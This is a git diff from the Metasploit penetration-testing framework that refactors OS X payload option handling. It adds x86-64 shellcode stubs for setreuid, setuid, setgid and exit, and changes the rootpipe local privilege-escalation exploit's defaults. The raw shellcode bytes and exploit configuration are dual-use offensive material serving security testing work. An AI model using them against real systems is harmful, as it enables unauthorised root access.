diff --git a/lib/msf/core/payload/linux.rb b/lib/msf/core/payload/linux.rb index aa91314e6b..a3431949f1 100644 --- a/lib/msf/core/payload/linux.rb +++ b/lib/msf/core/payload/linux.rb @@ -87,10 +87,6 @@ module Msf::Payload::Linux ret end - - # - # Overload the generate() call to prefix our stubs - # def apply_prepends(buf) pre = '' app = '' diff --git a/lib/msf/core/payload/osx.rb b/lib/msf/core/payload/osx.rb index 0eab13d568..35b1a82637 100644 --- a/lib/msf/core/payload/osx.rb +++ b/lib/msf/core/payload/osx.rb @@ -23,49 +23,49 @@ module Msf::Payload::Osx [ false, "Prepend a stub that executes the setresuid(0, 0, 0) system call", - "false" + false ] ), Msf::OptBool.new('PrependSetreuid', [ false, "Prepend a stub that executes the setreuid(0, 0) system call", - "false" + false ] ), Msf::OptBool.new('PrependSetuid', [ false, "Prepend a stub that executes the setuid(0) system call", - "false" + false ] ), Msf::OptBool.new('PrependSetresgid', [ false, "Prepend a stub that executes the setresgid(0, 0, 0) system call", - "false" + false ] ), Msf::OptBool.new('PrependSetregid', [ false, "Prepend a stub that executes the setregid(0, 0) system call", - "false" + false ] ), Msf::OptBool.new('PrependSetgid', [ false, "Prepend a stub that executes the setgid(0) system call", - "false" + false ] ), Msf::OptBool.new('AppendExit', [ false, "Append a stub that executes the exit(0) system call", - "false" + false ] ), ], Msf::Payload::Osx) @@ -73,95 +73,155 @@ module Msf::Payload::Osx ret end - - # - # Overload the generate() call to prefix our stubs - # - def generate(*args) - # Call the real generator to get the payload - buf = super(*args) + def apply_prepends(buf) + test_arch = [ *(self.arch) ] pre = '' app = '' - test_arch = [ *(self.arch) ] - # Handle all x86 code here if (test_arch.include?(ARCH_X86)) - - # Prepend - - if (datastore['PrependSetresuid']) - # setresuid(0, 0, 0) - pre << "\x31\xc0" +# xorl %eax,%eax # - "\x50" +# pushl %eax # - "\x50" +# pushl %eax # - "\x50" +# pushl %eax # - "\x50" +# pushl %eax # - "\x66\xb8\x37\x01" +# movw $0x0137,%ax # - "\xcd\x80" # int $0x80 # - end - - if (datastore['PrependSetreuid']) - # setreuid(0, 0) - pre << "\x31\xc0" +# xorl %eax,%eax # - "\x50" +# pushl %eax # - "\x50" +# pushl %eax # - "\x50" +# pushl %eax # - "\xb0\x7e" +# movb $0x7e,%al # - "\xcd\x80" # int $0x80 # - end - - if (datastore['PrependSetuid']) - # setuid(0) - pre << "\x31\xc0" +# xorl %eax,%eax # - "\x50" +# pushl %eax # - "\x50" +# pushl %eax # - "\xb0\x17" +# movb $0x17,%al # - "\xcd\x80" # int $0x80 # - end - - if (datastore['PrependSetresgid']) - # setresgid(0, 0, 0) - pre << "\x31\xc0" +# xorl %eax,%eax # - "\x50" +# pushl %eax # - "\x50" +# pushl %eax # - "\x50" +# pushl %eax # - "\x50" +# pushl %eax # - "\x66\xb8\x38\x01" +# movw $0x0138,%ax # - "\xcd\x80" # int $0x80 # - end - - if (datastore['PrependSetregid']) - # setregid(0, 0) - pre << "\x31\xc0" +# xorl %eax,%eax # - "\x50" +# pushl %eax # - "\x50" +# pushl %eax # - "\x50" +# pushl %eax # - "\xb0\x7f" +# movb $0x7f,%al # - "\xcd\x80" # int $0x80 # - end - - if (datastore['PrependSetgid']) - # setgid(0) - pre << "\x31\xc0" +# xorl %eax,%eax # - "\x50" +# pushl %eax # - "\x50" +# pushl %eax # - "\xb0\xb5" +# movb $0xb5,%al # - "\xcd\x80" # int $0x80 # - end - # Append - - if (datastore['AppendExit']) - # exit(0) - app << "\x31\xc0" +# xorl %eax,%eax # - "\x50" +# pushl %eax # - "\xb0\x01" +# movb $0x01,%al # - "\xcd\x80" # int $0x80 # - end - + handle_x86_osx_opts(pre, app) + elsif (test_arch.include?(ARCH_X86_64)) + handle_x64_osx_opts(pre, app) end - return (pre + buf + app) + pre + buf + app + end + + def handle_x86_osx_opts(pre, app) + if (datastore['PrependSetresuid']) + # setresuid(0, 0, 0) + pre << "\x31\xc0" +# xorl %eax,%eax # + "\x50" +# pushl %eax # + "\x50" +# pushl %eax # + "\x50" +# pushl %eax # + "\x50" +# pushl %eax # + "\x66\xb8\x37\x01" +# movw $0x0137,%ax # + "\xcd\x80" # int $0x80 # + end + + if (datastore['PrependSetreuid']) + # setreuid(0, 0) + pre << "\x31\xc0" +# xorl %eax,%eax # + "\x50" +# pushl %eax # + "\x50" +# pushl %eax # + "\x50" +# pushl %eax # + "\xb0\x7e" +# movb $0x7e,%al # + "\xcd\x80" # int $0x80 # + end + + if (datastore['PrependSetuid']) + # setuid(0) + pre << "\x31\xc0" +# xorl %eax,%eax # + "\x50" +# pushl %eax # + "\x50" +# pushl %eax # + "\xb0\x17" +# movb $0x17,%al # + "\xcd\x80" # int $0x80 # + end + + if (datastore['PrependSetresgid']) + # setresgid(0, 0, 0) + pre << "\x31\xc0" +# xorl %eax,%eax # + "\x50" +# pushl %eax # + "\x50" +# pushl %eax # + "\x50" +# pushl %eax # + "\x50" +# pushl %eax # + "\x66\xb8\x38\x01" +# movw $0x0138,%ax # + "\xcd\x80" # int $0x80 # + end + + if (datastore['PrependSetregid']) + # setregid(0, 0) + pre << "\x31\xc0" +# xorl %eax,%eax # + "\x50" +# pushl %eax # + "\x50" +# pushl %eax # + "\x50" +# pushl %eax # + "\xb0\x7f" +# movb $0x7f,%al # + "\xcd\x80" # int $0x80 # + end + + if (datastore['PrependSetgid']) + # setgid(0) + pre << "\x31\xc0" +# xorl %eax,%eax # + "\x50" +# pushl %eax # + "\x50" +# pushl %eax # + "\xb0\xb5" +# movb $0xb5,%al # + "\xcd\x80" # int $0x80 # + end + + if (datastore['AppendExit']) + # exit(0) + app << "\x31\xc0" +# xorl %eax,%eax # + "\x50" +# pushl %eax # + "\xb0\x01" +# movb $0x01,%al # + "\xcd\x80" # int $0x80 # + end + end + + def handle_x64_osx_opts(pre, app) + if (datastore['PrependSetresuid']) + # setresuid(0, 0, 0) + raise RuntimeError, "setresuid syscall is not implemented on x64 OSX systems" + end + + if (datastore['PrependSetreuid']) + # setreuid(0, 0) + pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24) + "\x49\xc1\xe0\x18" +# shl r8, 24 + "\x49\x83\xc8\x7e" +# or r8, 126 (setreuid=126) + "\x4c\x89\xc0" +# mov rax, r8 + "\x48\x31\xff" +# xor rdi, rdi 0 + "\x48\x31\xf6" +# xor rsi, rsi 0 + "\x0f\x05" # syscall + end + + if (datastore['PrependSetuid']) + # setuid(0) + pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24) + "\x49\xc1\xe0\x18" +# shl r8, 24 + "\x49\x83\xc8\x17" +# or r8, 23 (setuid=23) + "\x4c\x89\xc0" +# mov rax, r8 + "\x48\x31\xff" +# xor rdi, rdi 0 + "\x0f\x05" # syscall + end + + if (datastore['PrependSetresgid']) + # setresgid(0, 0, 0) + raise RuntimeError, "setresgid syscall is not implemented on x64 OSX systems" + end + + if (datastore['PrependSetregid']) + # setregid(0, 0) + pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24) + "\x49\xc1\xe0\x18" +# shl r8, 24 + "\x49\x83\xc8\x7f" +# or r8, 127 (setregid=127) + "\x4c\x89\xc0" +# mov rax, r8 + "\x48\x31\xff" +# xor rdi, rdi 0 + "\x48\x31\xf6" +# xor rsi, rsi 0 + "\x0f\x05" # syscall + end + + if (datastore['PrependSetgid']) + # setgid(0) + pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24) + "\x49\xc1\xe0\x17" +# shl r8, 23 + "\x49\x83\xc8\x5a" +# or r8, 90 (setgid=181>>1=90) + "\x49\xd1\xe0" +# shl r8, 1 + "\x49\x83\xc8\x01" +# or r8, 1 (setgid=181&1=1) + "\x4c\x89\xc0" +# mov rax, r8 + "\x48\x31\xff" +# xor rdi, rdi 0 + "\x0f\x05" # syscall + end + + if (datastore['AppendExit']) + # exit(0) + app << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24) + "\x49\xc1\xe0\x18" +# shl r8, 24 + "\x49\x83\xc8\x01" +# or r8, 1 (exit=1) + "\x4c\x89\xc0" +# mov rax, r8 + "\x48\x31\xff" +# xor rdi, rdi 0 + "\x0f\x05" # syscall + end end diff --git a/modules/exploits/osx/local/rootpipe.rb b/modules/exploits/osx/local/rootpipe.rb index bc4bbded25..57b18d91a9 100644 --- a/modules/exploits/osx/local/rootpipe.rb +++ b/modules/exploits/osx/local/rootpipe.rb @@ -42,13 +42,13 @@ class Metasploit4 < Msf::Exploit::Local 'Platform' => 'osx', 'Arch' => ARCH_X86_64, 'SessionTypes' => ['shell'], + 'Privileged' => true, 'Targets' => [ ['Mac OS X 10.9-10.10.2', {}] ], 'DefaultTarget' => 0, 'DefaultOptions' => { - 'PAYLOAD' => 'osx/x64/shell_reverse_tcp', - 'CMD' => '/bin/zsh' + 'PrependSetreuid' => true } )) diff --git a/modules/payloads/singles/osx/x86/exec.rb b/modules/payloads/singles/osx/x86/exec.rb index 70e84e6000..d88a57cf46 100644 --- a/modules/payloads/singles/osx/x86/exec.rb +++ b/modules/payloads/singles/osx/x86/exec.rb @@ -17,7 +17,7 @@ require 'msf/core' ### module Metasploit3 - CachedSize = 81 + CachedSize = 16 include Msf::Payload::Single include Msf::Payload::Osx diff --git a/modules/payloads/singles/osx/x86/shell_bind_tcp.rb b/modules/payloads/singles/osx/x86/shell_bind_tcp.rb index f5ab2fa770..3ceef27567 100644 --- a/modules/payloads/singles/osx/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/osx/x86/shell_bind_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options' module Metasploit3 - CachedSize = 139 + CachedSize = 74 include Msf::Payload::Single include Msf::Payload::Osx diff --git a/modules/payloads/singles/osx/x86/shell_find_port.rb b/modules/payloads/singles/osx/x86/shell_find_port.rb index b27eb869f8..a73ce6d16a 100644 --- a/modules/payloads/singles/osx/x86/shell_find_port.rb +++ b/modules/payloads/singles/osx/x86/shell_find_port.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options' module Metasploit3 - CachedSize = 126 + CachedSize = 61 include Msf::Payload::Single include Msf::Payload::Osx diff --git a/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb b/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb index 8e1434c354..448d9fcd01 100644 --- a/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options' module Metasploit3 - CachedSize = 130 + CachedSize = 65 include Msf::Payload::Single include Msf::Payload::Osx diff --git a/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb b/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb index 6ffc3928d8..d40d2cdaf7 100644 --- a/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb +++ b/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options' module Metasploit3 - CachedSize = 217 + CachedSize = 152 include Msf::Payload::Single include Msf::Payload::Osx diff --git a/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb b/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb index 84f3502cab..3803a6ce9c 100644 --- a/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options' module Metasploit3 - CachedSize = 196 + CachedSize = 131 include Msf::Payload::Single include Msf::Payload::Osx